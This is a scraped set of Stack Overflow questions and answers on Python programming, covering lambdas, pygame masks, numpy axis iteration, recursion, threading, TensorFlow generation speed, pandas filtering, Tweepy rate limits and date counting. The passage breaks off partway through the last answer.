combinator(lambda x:x*10)(11)(12) = combinator(f)(11)(12) = f(12) = 12*10 = 120
How to read and break down complex lambda equations in python
This question below is from a past year NUS exam paper, and im not sure how to go about solving this; how do you break down the lambda parts and figure out which bracket is for which lambda variable? I'm unable to trace the code to get 120 def combinator(y): return (lambda x: lambda y: x(y))(lambda x:y) combinator(lambda x:x*10)(11)(12) Ive tried to google but the lambda tutorials are mostly basic so im not sure how to read and break down more complex lambda codes and higher order functions
[ "The function is\ndef combinator(y):\n return (lambda x: lambda y: x(y))(lambda x:y)\ncombinator(lambda x:x*10)(11)(12)\n\nLet's try to simplify the function. First, take note that you can change the symbol for a function. For example, lambda x: x can be changed to lambda z: z.\nAs there are a lot of x and y, we will change the symbols to reduce the confusion.\ndef combinator(y):\n return (lambda w: lambda z: w(z))(lambda x:y)\ncombinator(lambda x:x*10)(11)(12)\n\nLet's try to define the function as mathematics function to make it easier to understand. Let's set\nf represents lambda x:x*10, so f(x) = x*10\ng represents lambda x:y, so g(x) = y\nh represents lambda z:w(z), so h(z) = w(z) => h = w\nk represents lambda w: lambda z: w(z), so k(w) = h = w\nWith the mathematics function defined, you can substitute them back to the function.\ncombinator(y)\n= (lambda w: lambda z: w(z))(lambda x:y) \n= k(g)\n= g\n\nTherefore, we know that combinator(y) = g\ncombinator(y)(x) = g(x) = y\ncombinator(y)(x)(z) = y(z)\n\nTherefore\ncombinator(lambda x:x*10)(11)(12)\n= combinator(f)(11)(12)\n= f(12)\n= 12*10\n= 120\n\n" ]
[ 0 ]
[]
[]
[ "function", "higher_order_functions", "lambda", "python" ]
stackoverflow_0074573856_function_higher_order_functions_lambda_python.txt
Q: Can some one tell me how i can mask only front part of a car image in pygame? I am making a car racing game, i want to mask front part of the car image (not the whole car image) for collision detection. code front = pygame.mask.from_surface(self.car.car_image) offset = (int(self.car.x-x), int(self.car.y-y)) p = track.overlap(front, offset) A: You can create a subsurface of the image and then a mask from the subsurface: front_surf = self.car.car_image.subsurface((0, 0, width, front_height)) front = pygame.mask.from_surface(front_surf)
Can some one tell me how i can mask only front part of a car image in pygame?
I am making a car racing game, i want to mask front part of the car image (not the whole car image) for collision detection. code front = pygame.mask.from_surface(self.car.car_image) offset = (int(self.car.x-x), int(self.car.y-y)) p = track.overlap(front, offset)
[ "You can create a subsurface of the image and then a mask from the subsurface:\nfront_surf = self.car.car_image.subsurface((0, 0, width, front_height))\nfront = pygame.mask.from_surface(front_surf)\n\n" ]
[ 0 ]
[]
[]
[ "pygame", "python" ]
stackoverflow_0074574963_pygame_python.txt
Q: Iterate over inner axes of an array I want to iterate over some inner dimensions of an array without knowing in advance how many dimensions to iterate over. Furthermore I only know that the last two dimensions should not be iterated over. For example assume the array has dimension 5 and shape (i,j,k,l,m) and I want to iterate over the second and third dimension. In each step of the iteration I expect an array of shape (i,l,m). Example 1: Iterate over second dimension of x with x.ndim=4, x.shape=(I,J,K,L). Expected: x[:,j,:,:] for j=0,...,J-1 Example 2: Iterate over second and third dimension of x with x.ndim=5, x.shape=(I,J,K,L,M) Expected: x[:,j,k,:,:] for j=0,...,J-1, k=0,...,K-1 Example 3: Iterate over second, third and fourth dimension of x with x.ndim=6, x.shape=(I,J,K,L,M,N) Expected: x[:,j,k,l,:,:] for j=0,...,J-1, k=0,...,K-1 and l=0,...,L-1 Assume the array has dimension 5 and shape (i,j,k,l,m). If I know which dimension to iterate over, for example the second and third axis, this is possible with a nested for-loop: for j in range(x.shape[1]): for k in range(x.shape[2]): x[...,j,k,:,:] However since I do not know in advance how many dimensions I want to iterate over for-loops are not an option. I found a way to generate the indices based on the shapes of the dimensions I want to iterate over. for b in product(*map(range, x.shape[2:4])): print(b) >>> (0, 0) >>> (0, 1) >>> ... >>> (0, k) >>> ... >>> (j, k) This yields the indices for arbitrary inner dimension which is what I want. However I'm not aware of a way to use this tuple directly to slice into an an array. Therefore I first need to assign these entries to variables and then use these variables for slicing. for b in product(*map(range,x.shape[2:4])): j,k=b x[...,j,k,:,:] But this approach again only works if I know in advance how many dimensions to iterate over. A: With the caveat that I don't fully understand how you want to use this, I reckon the following should do what you are asking for: from itertools import product def iterover(x, axes): x = np.moveaxis(x, axes, np.arange(len(axes))) subshape = x.shape[:len(axes)] ixi = product(*[range(k) for k in subshape]) for ix in ixi: yield ix, x[ix] Example: def genrange(shape): return np.arange(np.product(shape)).reshape(shape) x = genrange((2,3,4,5)) >>> x.shape (2, 3, 4, 5) >>> {ix: xx.shape for ix, xx in iterover(x, (1,2))} {(0, 0): (2, 5), (0, 1): (2, 5), (0, 2): (2, 5), (0, 3): (2, 5), (1, 0): (2, 5), (1, 1): (2, 5), (1, 2): (2, 5), (1, 3): (2, 5), (2, 0): (2, 5), (2, 1): (2, 5), (2, 2): (2, 5), (2, 3): (2, 5)} Notes: The axes to iterate over may be in any order, e.g.: >>> {ix: xx.shape for ix, xx in iterover(x, (2,0))} {(0, 0): (3, 5), (0, 1): (3, 5), (1, 0): (3, 5), (1, 1): (3, 5), (2, 0): (3, 5), (2, 1): (3, 5), (3, 0): (3, 5), (3, 1): (3, 5)} The sub arrays can be used as L-values (modified in place), with the original array modified accordingly. This is due to np.moveaxis() returning a view of the original array (numpy never ceases to amaze me): for ix, xx in iterover(x, (2,0)): if ix == (0,0): xx *= -1 >>> x array([[[[ 0, -1, -2, -3, -4], [ 5, 6, 7, 8, 9], [ 10, 11, 12, 13, 14], [ 15, 16, 17, 18, 19]], [[-20, -21, -22, -23, -24], [ 25, 26, 27, 28, 29], [ 30, 31, 32, 33, 34], [ 35, 36, 37, 38, 39]], ...
Iterate over inner axes of an array
I want to iterate over some inner dimensions of an array without knowing in advance how many dimensions to iterate over. Furthermore I only know that the last two dimensions should not be iterated over. For example assume the array has dimension 5 and shape (i,j,k,l,m) and I want to iterate over the second and third dimension. In each step of the iteration I expect an array of shape (i,l,m). Example 1: Iterate over second dimension of x with x.ndim=4, x.shape=(I,J,K,L). Expected: x[:,j,:,:] for j=0,...,J-1 Example 2: Iterate over second and third dimension of x with x.ndim=5, x.shape=(I,J,K,L,M) Expected: x[:,j,k,:,:] for j=0,...,J-1, k=0,...,K-1 Example 3: Iterate over second, third and fourth dimension of x with x.ndim=6, x.shape=(I,J,K,L,M,N) Expected: x[:,j,k,l,:,:] for j=0,...,J-1, k=0,...,K-1 and l=0,...,L-1 Assume the array has dimension 5 and shape (i,j,k,l,m). If I know which dimension to iterate over, for example the second and third axis, this is possible with a nested for-loop: for j in range(x.shape[1]): for k in range(x.shape[2]): x[...,j,k,:,:] However since I do not know in advance how many dimensions I want to iterate over for-loops are not an option. I found a way to generate the indices based on the shapes of the dimensions I want to iterate over. for b in product(*map(range, x.shape[2:4])): print(b) >>> (0, 0) >>> (0, 1) >>> ... >>> (0, k) >>> ... >>> (j, k) This yields the indices for arbitrary inner dimension which is what I want. However I'm not aware of a way to use this tuple directly to slice into an an array. Therefore I first need to assign these entries to variables and then use these variables for slicing. for b in product(*map(range,x.shape[2:4])): j,k=b x[...,j,k,:,:] But this approach again only works if I know in advance how many dimensions to iterate over.
[ "With the caveat that I don't fully understand how you want to use this, I reckon the following should do what you are asking for:\nfrom itertools import product\n\ndef iterover(x, axes):\n x = np.moveaxis(x, axes, np.arange(len(axes)))\n subshape = x.shape[:len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in ixi:\n yield ix, x[ix]\n\nExample:\ndef genrange(shape):\n return np.arange(np.product(shape)).reshape(shape)\n\nx = genrange((2,3,4,5))\n>>> x.shape\n(2, 3, 4, 5)\n\n>>> {ix: xx.shape for ix, xx in iterover(x, (1,2))}\n{(0, 0): (2, 5),\n (0, 1): (2, 5),\n (0, 2): (2, 5),\n (0, 3): (2, 5),\n (1, 0): (2, 5),\n (1, 1): (2, 5),\n (1, 2): (2, 5),\n (1, 3): (2, 5),\n (2, 0): (2, 5),\n (2, 1): (2, 5),\n (2, 2): (2, 5),\n (2, 3): (2, 5)}\n\nNotes:\n\nThe axes to iterate over may be in any order, e.g.:\n>>> {ix: xx.shape for ix, xx in iterover(x, (2,0))}\n{(0, 0): (3, 5),\n (0, 1): (3, 5),\n (1, 0): (3, 5),\n (1, 1): (3, 5),\n (2, 0): (3, 5),\n (2, 1): (3, 5),\n (3, 0): (3, 5),\n (3, 1): (3, 5)}\n\n\nThe sub arrays can be used as L-values (modified in place), with the original array modified accordingly. This is due to np.moveaxis() returning a view of the original array (numpy never ceases to amaze me):\nfor ix, xx in iterover(x, (2,0)):\n if ix == (0,0):\n xx *= -1\n\n>>> x\narray([[[[ 0, -1, -2, -3, -4],\n [ 5, 6, 7, 8, 9],\n [ 10, 11, 12, 13, 14],\n [ 15, 16, 17, 18, 19]],\n\n [[-20, -21, -22, -23, -24],\n [ 25, 26, 27, 28, 29],\n [ 30, 31, 32, 33, 34],\n [ 35, 36, 37, 38, 39]],\n...\n\n\n\n" ]
[ 0 ]
[]
[]
[ "numpy", "numpy_ndarray", "numpy_slicing", "python" ]
stackoverflow_0074574094_numpy_numpy_ndarray_numpy_slicing_python.txt
Q: Addition and multiplication recursion I've been trying to write a recursive function that adds the following number to an odd number, and multiplies by the following number if the number is even. Essentially: add_mult_rec(5) does 1+2*3+4*5 and should return 27 But by writing: def add_mult_rec(num): if num == 1: return num elif num % 2 == 1: return num * add_mult_rec(num - 1) elif num % 2 == 0: return num + add_mult_rec(num - 1) my output for add_mult_rec(5) is: 65 A: The order of operation should be respected, what you wants is actually: 1 + (2 x 3) + (4 x 5) +... def add_mult_rec(num): if num <= 1: return num if num % 2 == 1: return num * (num - 1) + add_mult_rec(num - 2) else: return num + add_mult_rec(num - 1)
Addition and multiplication recursion
I've been trying to write a recursive function that adds the following number to an odd number, and multiplies by the following number if the number is even. Essentially: add_mult_rec(5) does 1+2*3+4*5 and should return 27 But by writing: def add_mult_rec(num): if num == 1: return num elif num % 2 == 1: return num * add_mult_rec(num - 1) elif num % 2 == 0: return num + add_mult_rec(num - 1) my output for add_mult_rec(5) is: 65
[ "The order of operation should be respected, what you wants is actually: 1 + (2 x 3) + (4 x 5) +...\ndef add_mult_rec(num):\n if num <= 1:\n return num\n \n if num % 2 == 1:\n return num * (num - 1) + add_mult_rec(num - 2)\n else:\n return num + add_mult_rec(num - 1)\n\n" ]
[ 3 ]
[]
[]
[ "python", "recursion" ]
stackoverflow_0074574806_python_recursion.txt
Q: Thread wont start within __init__ method of my class Within the __init__ of my class I want to trigger a thread that handles a function. For some reason the thread isnt triggered though, nothing just happens: class OrderBook: # Create two sorted lists for bids and asks def __init__(self, bids=None, asks=None): if asks is None: asks = [] if bids is None: bids = [] self.bids = sortedcontainers.SortedList(bids, key=lambda order: -order.price) self.asks = sortedcontainers.SortedList(asks, key=lambda order: order.price) # Populate Orderbook with 50 orders threading.Thread(target=populate_orderbook(self, 10)).start() print(f'Orderbook initialized..') ... And the function to be triggered which isnt though def populate_orderbook(orderbook_instance, n): order_type = ['Limit'] side = ['Buy', 'Sell'] i = 1 while i < n: # Create random order order_obj = Order( order_type=order_type[0], side=random.choice(side), price=random.randint(1, 1000), power=random.randint(1, 1000), ) orderbook_instance.add(order_obj) print(f'Orderbook prepopulated..') A: You are calling the target function eagerly, on the main thread. You have to pass the function as an argument to the Thread constructor, and the arguments in separate, so that the function will be called inside the running thread: threading.Thread(target=populate_orderbook, args=(self, 10)).start()
Thread wont start within __init__ method of my class
Within the __init__ of my class I want to trigger a thread that handles a function. For some reason the thread isnt triggered though, nothing just happens: class OrderBook: # Create two sorted lists for bids and asks def __init__(self, bids=None, asks=None): if asks is None: asks = [] if bids is None: bids = [] self.bids = sortedcontainers.SortedList(bids, key=lambda order: -order.price) self.asks = sortedcontainers.SortedList(asks, key=lambda order: order.price) # Populate Orderbook with 50 orders threading.Thread(target=populate_orderbook(self, 10)).start() print(f'Orderbook initialized..') ... And the function to be triggered which isnt though def populate_orderbook(orderbook_instance, n): order_type = ['Limit'] side = ['Buy', 'Sell'] i = 1 while i < n: # Create random order order_obj = Order( order_type=order_type[0], side=random.choice(side), price=random.randint(1, 1000), power=random.randint(1, 1000), ) orderbook_instance.add(order_obj) print(f'Orderbook prepopulated..')
[ "You are calling the target function eagerly, on the main thread.\nYou have to pass the function as an argument to the Thread constructor, and the arguments in separate, so that the function will be called inside the running thread:\n threading.Thread(target=populate_orderbook, args=(self, 10)).start()\n\n" ]
[ 1 ]
[]
[]
[ "multithreading", "python" ]
stackoverflow_0074574979_multithreading_python.txt
Q: Speeding up TF/Keras LSTM text generation on GPU? The tensorflow official example for text generation (https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb) runs in a loop as defined below. The text generation feels slow, and according to NVTOP only uses a fraction of the available GPU resources (15-20%). Any suggestions on how to speed up text generation? A quick look at cprofiler shows that 90% of the time is spent on the single line predictions = model(input_eval), so I don't think there are a lot of gains to be had elsewhere. Also, the Tensorflow/Keras documentation https://www.tensorflow.org/api_docs/python/tf/keras/Model#predict recommends calling the function just as is done below... this method is designed for performance in large scale inputs. For small amount of inputs that fit in one batch, directly using call is recommended for faster execution, e.g., model(x), or model(x, training=False) Any suggestions on how to speed up text generation? Would it be possible to better use the GPU by generating multiple lines at the same time? def generate_text(model, start_string): # Evaluation step (generating text using the learned model) # Number of characters to generate num_generate = 1000 # Converting our start string to numbers (vectorizing) input_eval = [char2idx[s] for s in start_string] input_eval = tf.expand_dims(input_eval, 0) # Empty string to store our results text_generated = [] # Low temperatures results in more predictable text. # Higher temperatures results in more surprising text. # Experiment to find the best setting. temperature = 1.0 # Here batch size == 1 model.reset_states() for i in range(num_generate): predictions = model(input_eval) # remove the batch dimension predictions = tf.squeeze(predictions, 0) # using a categorical distribution to predict the character returned by the model predictions = predictions / temperature predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy() # We pass the predicted character as the next input to the model # along with the previous hidden state input_eval = tf.expand_dims([predicted_id], 0) text_generated.append(idx2char[predicted_id]) return (start_string + ''.join(text_generated)) A: To speed up the processing, I have two suggestions, As you have GPU support, you may want to set unroll=True of the GRU layer. As per the Keras GRU documentation, setting unroll=True reduces some computation by using some extra memory. As your GPU consumption is quite less, you may want to use unroll=True. Using this setting, you may notice up to 2x speed boost (depending on the circumstances). However, you should avoid using unroll if the input sequence is too long. I noticed that the text-generation architecture you linked uses GRU layer before a Dense layer. The GRU is given a parameter return_sequences=True. This causes the GRU layer to pass unnecessary output values to the following Dense layers and requires more computation. Generally, return_sequences=True should be only set if the following layer of the model is also an RNN layer. Therefore, try setting the parameter return_sequences=False. This may also improve performance. Finally, the model(x, training=False) really works. I believe by maintaining these three issues, you may notice a significant performance improvement. A: Not sure you can speed generation. You are doing num_generate forward calls on your model for an input with batch size of 1. While during training, you can operate on the whole sequence and compute a loss over it, during predicting each new character depends on the previously generated ones and the generation function doesn't run in parallel. If you want to see higher GPU utilization, you could call predict on a batch of inputs seeded with different starting characters - this relates to your question about 'generating multiple lines at the same time'. You could also try using the same starting character and tinker with the hidden state to input into the model, e.g. seeing what a randomly sampled state for the batch produces or extracting hidden state vectors for that starting character from training examples and populating the batched hidden state with those so your models goes in different directions from this initial character. A: Better performance could be also achieved by using a different toolkit for the inference e.g. OpenVINO. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime. It's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below. Install OpenVINO The easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case. pip install openvino-dev[tensorflow2] Save your model as SavedModel OpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first. import tensorflow as tf from custom_layer import CustomLayer model = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer}) tf.saved_model.save(model, 'model') Use Model Optimizer to convert SavedModel model The Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line: mo --saved_model_dir "model" --data_type FP32 --output_dir "model_ir" Run the inference The converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know what the best choice for you is, use AUTO. You care about latency, so I suggest adding a performance hint (as shown below) to use the device that fulfills your requirement. # Load the network ie = Core() model_ir = ie.read_model(model="model_ir/model.xml") compiled_model_ir = ie.compile_model(model=model_ir, device_name="AUTO", config={"PERFORMANCE_HINT":"LATENCY"}) # Get output layer output_layer_ir = compiled_model_ir.output(0) # Run inference on the input image result = compiled_model_ir([input_image])[output_layer_ir] Disclaimer: I work on OpenVINO. OpenVINO is optimized for Intel hardware.
Speeding up TF/Keras LSTM text generation on GPU?
The tensorflow official example for text generation (https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb) runs in a loop as defined below. The text generation feels slow, and according to NVTOP only uses a fraction of the available GPU resources (15-20%). Any suggestions on how to speed up text generation? A quick look at cprofiler shows that 90% of the time is spent on the single line predictions = model(input_eval), so I don't think there are a lot of gains to be had elsewhere. Also, the Tensorflow/Keras documentation https://www.tensorflow.org/api_docs/python/tf/keras/Model#predict recommends calling the function just as is done below... this method is designed for performance in large scale inputs. For small amount of inputs that fit in one batch, directly using call is recommended for faster execution, e.g., model(x), or model(x, training=False) Any suggestions on how to speed up text generation? Would it be possible to better use the GPU by generating multiple lines at the same time? def generate_text(model, start_string): # Evaluation step (generating text using the learned model) # Number of characters to generate num_generate = 1000 # Converting our start string to numbers (vectorizing) input_eval = [char2idx[s] for s in start_string] input_eval = tf.expand_dims(input_eval, 0) # Empty string to store our results text_generated = [] # Low temperatures results in more predictable text. # Higher temperatures results in more surprising text. # Experiment to find the best setting. temperature = 1.0 # Here batch size == 1 model.reset_states() for i in range(num_generate): predictions = model(input_eval) # remove the batch dimension predictions = tf.squeeze(predictions, 0) # using a categorical distribution to predict the character returned by the model predictions = predictions / temperature predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy() # We pass the predicted character as the next input to the model # along with the previous hidden state input_eval = tf.expand_dims([predicted_id], 0) text_generated.append(idx2char[predicted_id]) return (start_string + ''.join(text_generated))
[ "To speed up the processing, I have two suggestions,\n\nAs you have GPU support, you may want to set unroll=True of the GRU layer. As per the Keras GRU documentation, setting unroll=True reduces some computation by using some extra memory. As your GPU consumption is quite less, you may want to use unroll=True. Using this setting, you may notice up to 2x speed boost (depending on the circumstances). However, you should avoid using unroll if the input sequence is too long.\n\nI noticed that the text-generation architecture you linked uses GRU layer before a Dense layer. The GRU is given a parameter return_sequences=True. This causes the GRU layer to pass unnecessary output values to the following Dense layers and requires more computation. Generally, return_sequences=True should be only set if the following layer of the model is also an RNN layer. Therefore, try setting the parameter return_sequences=False. This may also improve performance.\n\n\nFinally, the model(x, training=False) really works. I believe by maintaining these three issues, you may notice a significant performance improvement.\n", "Not sure you can speed generation. You are doing num_generate forward calls on your model for an input with batch size of 1. While during training, you can operate on the whole sequence and compute a loss over it, during predicting each new character depends on the previously generated ones and the generation function doesn't run in parallel.\nIf you want to see higher GPU utilization, you could call predict on a batch of inputs seeded with different starting characters - this relates to your question about 'generating multiple lines at the same time'.\nYou could also try using the same starting character and tinker with the hidden state to input into the model, e.g. seeing what a randomly sampled state for the batch produces or extracting hidden state vectors for that starting character from training examples and populating the batched hidden state with those so your models goes in different directions from this initial character.\n", "Better performance could be also achieved by using a different toolkit for the inference e.g. OpenVINO. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime.\nIt's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below.\nInstall OpenVINO\nThe easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case.\npip install openvino-dev[tensorflow2]\n\nSave your model as SavedModel\nOpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first.\nimport tensorflow as tf\nfrom custom_layer import CustomLayer\nmodel = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer})\ntf.saved_model.save(model, 'model')\n\nUse Model Optimizer to convert SavedModel model\nThe Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line:\nmo --saved_model_dir \"model\" --data_type FP32 --output_dir \"model_ir\"\n\nRun the inference\nThe converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know what the best choice for you is, use AUTO. You care about latency, so I suggest adding a performance hint (as shown below) to use the device that fulfills your requirement.\n# Load the network\nie = Core()\nmodel_ir = ie.read_model(model=\"model_ir/model.xml\")\ncompiled_model_ir = ie.compile_model(model=model_ir, device_name=\"AUTO\", config={\"PERFORMANCE_HINT\":\"LATENCY\"})\n\n# Get output layer\noutput_layer_ir = compiled_model_ir.output(0)\n\n# Run inference on the input image\nresult = compiled_model_ir([input_image])[output_layer_ir]\n\nDisclaimer: I work on OpenVINO. OpenVINO is optimized for Intel hardware.\n" ]
[ 1, 0, 0 ]
[]
[]
[ "keras", "performance", "python", "tensorflow" ]
stackoverflow_0061875324_keras_performance_python_tensorflow.txt
Q: Querying a dataframe to return rows based on a list/ndarray of conditions Say I have a dataframe 'df': And an array of numbers, called 'profiles': [310, 47, 161, 51, 78, 162, 303, 314, 176, 54] I'm trying to query 'df' on column 'dayNo' to only returns rows which match the array above (profiles), but not sure how. I attempted the below, but to no avail: df2 = df.loc[df['dayNo'] == [np.array([profiles], dtype=bool)]] Any help greatly appreciated, thanks! A: You can use boolean indexing with pandas.Series.isin : df2 = df.loc[df['dayNo'].isin(profiles)] Another method is pandas.DataFrame.query : df2 = df.query('dayNo in @profiles')
Querying a dataframe to return rows based on a list/ndarray of conditions
Say I have a dataframe 'df': And an array of numbers, called 'profiles': [310, 47, 161, 51, 78, 162, 303, 314, 176, 54] I'm trying to query 'df' on column 'dayNo' to only returns rows which match the array above (profiles), but not sure how. I attempted the below, but to no avail: df2 = df.loc[df['dayNo'] == [np.array([profiles], dtype=bool)]] Any help greatly appreciated, thanks!
[ "You can use boolean indexing with pandas.Series.isin :\ndf2 = df.loc[df['dayNo'].isin(profiles)]\n\nAnother method is pandas.DataFrame.query :\ndf2 = df.query('dayNo in @profiles')\n\n" ]
[ 2 ]
[]
[]
[ "numpy", "pandas", "python" ]
stackoverflow_0074574903_numpy_pandas_python.txt
Q: How to get all the likes of a twitter user using tweepy I'm using tweepy with 1.1 API and Elevated access. I have been trying to request all the likes of a user but there seems to be a limit of about 1430 returned tweets. I've tried with a couple of test accounts and it seems to get 1430-1440 then a "Too Many Requests - Rate limit exceeded" error is returned. This is the call: tweepy.Cursor( api.get_favorites, screen_name=twitterUsername ).items( 3000 ) When I call rate_limit_status() the only out of limits value is '/favorites/list', but the limit appears to be 75: Limit:75 Remaining: 0 Reset: {timestamp for 15 minutes later}. Frustratingly, initially the rate limit seemed to be more generous (over 2500 tweets were returned) Is there a way to work with Twitter's limits so that I can have access and work with all the likes of a user? Or at least is there a way to ask for the likes before a certain date? A: Pay careful attention to the word "rate" in that diagnostic. It refers to "records per hour", rather than "total number of records". Twitter offer extensive documentation on this topic: https://developer.twitter.com/en/docs/twitter-api/rate-limits#recovering You obtained a 429 status because you ignored the rate limit. Just sleep() a bit between requests. Code that does a one-off query and fails to sleep will more likely trigger a rate error when querying many records back-to-back than when querying few records. Consider using the excellent tenacity back-off / retry library.
How to get all the likes of a twitter user using tweepy
I'm using tweepy with 1.1 API and Elevated access. I have been trying to request all the likes of a user but there seems to be a limit of about 1430 returned tweets. I've tried with a couple of test accounts and it seems to get 1430-1440 then a "Too Many Requests - Rate limit exceeded" error is returned. This is the call: tweepy.Cursor( api.get_favorites, screen_name=twitterUsername ).items( 3000 ) When I call rate_limit_status() the only out of limits value is '/favorites/list', but the limit appears to be 75: Limit:75 Remaining: 0 Reset: {timestamp for 15 minutes later}. Frustratingly, initially the rate limit seemed to be more generous (over 2500 tweets were returned) Is there a way to work with Twitter's limits so that I can have access and work with all the likes of a user? Or at least is there a way to ask for the likes before a certain date?
[ "Pay careful attention to the word \"rate\" in that diagnostic.\nIt refers to \"records per hour\",\nrather than \"total number of records\".\nTwitter offer extensive documentation on this topic:\nhttps://developer.twitter.com/en/docs/twitter-api/rate-limits#recovering\nYou obtained a 429 status because you ignored the\nrate limit. Just sleep() a bit between requests.\nCode that does a one-off query and fails to sleep\nwill more likely trigger a rate error\nwhen querying many records back-to-back\nthan when querying few records.\nConsider using the excellent tenacity back-off / retry library.\n" ]
[ 1 ]
[]
[]
[ "api", "python", "tweepy", "twitter" ]
stackoverflow_0074574920_api_python_tweepy_twitter.txt
Q: Create a counter of date values for a given max-min interval Be the following python pandas DataFrame: | date | column_1 | column_2 | | ---------- | -------- | -------- | | 2022-02-01 | val | val2 | | 2022-02-03 | val1 | val | | 2022-02-01 | val | val3 | | 2022-02-04 | val2 | val | | 2022-02-27 | val2 | val4 | I want to create a new DataFrame, where each row has a value between the minimum and maximum date value from the original DataFrame. The counter column contains a row counter for that date. | date | counter | | ---------- | -------- | | 2022-02-01 | 2 | | 2022-02-02 | 0 | | 2022-02-03 | 1 | | 2022-02-04 | 1 | | 2022-02-05 | 0 | ... | 2022-02-26 | 0 | | 2022-02-27 | 1 | A: Count dates first & remove duplicates using Drop duplicates. Fill intermidiate dates with Pandas has asfreq function for datetimeIndex, this is basically just a thin, but convenient wrapper around reindex() which generates a date_range and calls reindex. df['counts'] = df['date'].map(df['date'].value_counts()) df = df.drop_duplicates(subset='date', keep="first") df.date = pd.to_datetime(df.date) df = df.set_index('date').asfreq('D').reset_index() df = df.fillna(0) print(df) Gives # date counts 0 2022-02-01 2.0 1 2022-02-02 0.0 2 2022-02-03 1.0 3 2022-02-04 1.0 4 2022-02-05 0.0 5 2022-02-06 0.0 6 2022-02-07 0.0 7 2022-02-08 0.0 8 2022-02-09 0.0 9 2022-02-10 0.0 10 2022-02-11 0.0 11 2022-02-12 0.0 12 2022-02-13 0.0 13 2022-02-14 0.0 14 2022-02-15 0.0 15 2022-02-16 0.0 16 2022-02-17 0.0 17 2022-02-18 0.0 18 2022-02-19 0.0 19 2022-02-20 0.0 20 2022-02-21 0.0 21 2022-02-22 0.0 22 2022-02-23 0.0 23 2022-02-24 0.0 24 2022-02-25 0.0 25 2022-02-26 0.0 A: Many ways to do this. Here is mine. Probably not optimal, but at least I am not iterating rows, nor using .apply, which are both sure recipes to create slow solutions import pandas as pd import datetime # A minimal example (you should provide such an example next time) df=pd.DataFrame({'date':pd.to_datetime(['2022-02-01', '2022-02-03', '2022-02-01', '2022-02-04', '2022-02-27']), 'c1':['val','val1','val','val2','val2'], 'c2':range(5)}) # A delta of 1 day, to create list of date dt=datetime.timedelta(days=1) # Result dataframe, with a count of 0 for now res=pd.DataFrame({'date':df.date.min()+dt*np.arange((df.date.max()-df.date.min()).days+1), 'count':0}) # Cound dates countDates=df[['date', 'c1']].groupby('date').agg('count') # Merge the counted dates with the target array, filling missing values with 0 res['count']=res.merge(countDates, on='date', how='left').fillna(0)['c1']
Create a counter of date values for a given max-min interval
Be the following python pandas DataFrame: | date | column_1 | column_2 | | ---------- | -------- | -------- | | 2022-02-01 | val | val2 | | 2022-02-03 | val1 | val | | 2022-02-01 | val | val3 | | 2022-02-04 | val2 | val | | 2022-02-27 | val2 | val4 | I want to create a new DataFrame, where each row has a value between the minimum and maximum date value from the original DataFrame. The counter column contains a row counter for that date. | date | counter | | ---------- | -------- | | 2022-02-01 | 2 | | 2022-02-02 | 0 | | 2022-02-03 | 1 | | 2022-02-04 | 1 | | 2022-02-05 | 0 | ... | 2022-02-26 | 0 | | 2022-02-27 | 1 |
[ "Count dates first & remove duplicates using Drop duplicates. Fill intermidiate dates with Pandas has asfreq function for datetimeIndex, this is basically just a thin, but convenient wrapper around reindex() which generates a date_range and calls reindex.\ndf['counts'] = df['date'].map(df['date'].value_counts())\ndf = df.drop_duplicates(subset='date', keep=\"first\")\n\ndf.date = pd.to_datetime(df.date)\ndf = df.set_index('date').asfreq('D').reset_index()\ndf = df.fillna(0)\nprint(df)\n\nGives #\n date counts\n0 2022-02-01 2.0\n1 2022-02-02 0.0\n2 2022-02-03 1.0\n3 2022-02-04 1.0\n4 2022-02-05 0.0\n5 2022-02-06 0.0\n6 2022-02-07 0.0\n7 2022-02-08 0.0\n8 2022-02-09 0.0\n9 2022-02-10 0.0\n10 2022-02-11 0.0\n11 2022-02-12 0.0\n12 2022-02-13 0.0\n13 2022-02-14 0.0\n14 2022-02-15 0.0\n15 2022-02-16 0.0\n16 2022-02-17 0.0\n17 2022-02-18 0.0\n18 2022-02-19 0.0\n19 2022-02-20 0.0\n20 2022-02-21 0.0\n21 2022-02-22 0.0\n22 2022-02-23 0.0\n23 2022-02-24 0.0\n24 2022-02-25 0.0\n25 2022-02-26 0.0\n\n", "Many ways to do this. Here is mine. Probably not optimal, but at least I am not iterating rows, nor using .apply, which are both sure recipes to create slow solutions\nimport pandas as pd\nimport datetime\n\n# A minimal example (you should provide such an example next time)\ndf=pd.DataFrame({'date':pd.to_datetime(['2022-02-01', '2022-02-03', '2022-02-01', '2022-02-04', '2022-02-27']), 'c1':['val','val1','val','val2','val2'], 'c2':range(5)})\n\n# A delta of 1 day, to create list of date\ndt=datetime.timedelta(days=1)\n\n# Result dataframe, with a count of 0 for now\nres=pd.DataFrame({'date':df.date.min()+dt*np.arange((df.date.max()-df.date.min()).days+1), 'count':0})\n\n# Cound dates\ncountDates=df[['date', 'c1']].groupby('date').agg('count')\n\n# Merge the counted dates with the target array, filling missing values with 